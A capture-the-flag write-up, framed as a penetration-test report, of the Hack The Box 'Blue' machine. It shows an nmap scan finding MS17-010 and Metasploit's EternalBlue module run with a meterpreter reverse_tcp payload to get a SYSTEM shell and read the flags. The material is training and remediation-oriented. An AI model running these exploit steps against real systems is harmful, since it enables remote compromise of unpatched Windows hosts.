Skip to content

Blue

Description

Write Up: Guillaume
Créateur: ch4p Difficulté: Facile

Enoncé

IP Address Description
10.10.10.40 Blue machin

Blue, while possibly the most simple machine on Hack The Box, demonstrates the severity of the EternalBlue exploit, which has been used in multiple large-scale ransomware and crypto-mining attacks since it was leaked publicly.

Solution détaillée

Assessment Overview and Recommendations

During the internal penetration test against the Blue machin, Guillaume Madec identified one (1) finding that threaten the confidentiality, integrity, and availability of Blue machine. The finding being assigned a high-risk rating.

Guillaume Madec noted that the management of patches and vulnerabilities of the Blue machine is not well maintained. The conclusion of this report is related to the lack of fixes for known vulnerabilities in services and applications, leading to unauthorized access and system compromise.

The discovery concerned an outdated network file sharing protocol, which could be used to gain unauthorized access to full control of the machine if an attacker could gain unauthorized access to the machine without credentials. This attack is very well documented, so it is very likely to be particularly damaging, even in the hands of an unskilled attacker. During the assessment, the presence of these resources was observed on the machine, so Hack The Box should start formulating a test plan to update the dangerous service.

Network Penetration Test Assessment Summary

Blue Machine Penetration Testing Evaluation Summary Guillaume Madec began all testing activities from the perspective of an unauthenticated user on the machine. Hack The Box provided the tester with an IP address and operating system type.

Summary of findings

During the course of testing, Guillaume Madec uncovered a total of one (1) finding that pose a material risk to Blue Machin. The below table provides a summary of the findings.

High Medium Low Total
1 0 0 1

Below is a high-level overview of each finding identified during testing. These findings are covered in depth in the Technical Findings Details section of this report.

Finding # Severity Level Finding Name
1 High EternalBlue attack

Technical Findings Details

  1. EternalBlue Attack
CWE CWE-20
CVSS 3.1 Score 8.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
Description (Incl. Root Cause) A SMB service version 1 was found, this version is vulnerable to eternalBlue attack.
Security Impact EternalBlue attack could lead to remote code execution as NT AUTHORITY\SYSTEM user
Affected Host(s) 10.10.10.40 (blue.htb)
Remediation update the SMB service from V1 to V2
External References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
. https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
. https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

Finding Evidence:

We can see in the result of the next command, the SMB service of the machine is vulnerable to the ms17-010 vulnerability: 

$ nmap -sV 10.10.10.40 -p- -Pn --script=vuln
<SNIP...>
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
<SNIP...>
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
<SNIP...>

It's a famous vulnerability, we can search if an exploit exist in metasploit: 

$ msfconsole
<SNIP...>

msf6 > search ms17-010
<SNIP...>
0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
<SNIP...>

After found an exploit, we can setting and run it: 

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
<SNIP...>
RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
<SNIP...>
LHOST     192.168.7.128    yes       The listen address (an interface may be specified)
<SNIP...>

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.16.5
LHOST => 10.10.16.5

![[Pasted image 20231202202635.png]]

msf6 exploit(windows/smb/ms17_010_eternalblue) > run
<SNIP...>
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<SNIP...>
meterpreter >

![[Pasted image 20231202203306.png]]

We have a shell as NT AUTHORITY\SYSTEM, we can now capture the flags: 

meterpreter > cd /
meterpreter > cat Users\\haris\\Desktop\\user.txt 
67a<REDACTED>a57
meterpreter > cat Users\\Administrator\\Desktop\\root.txt 
130<REDACTED>b46

![[Pasted image 20231202203723.png]]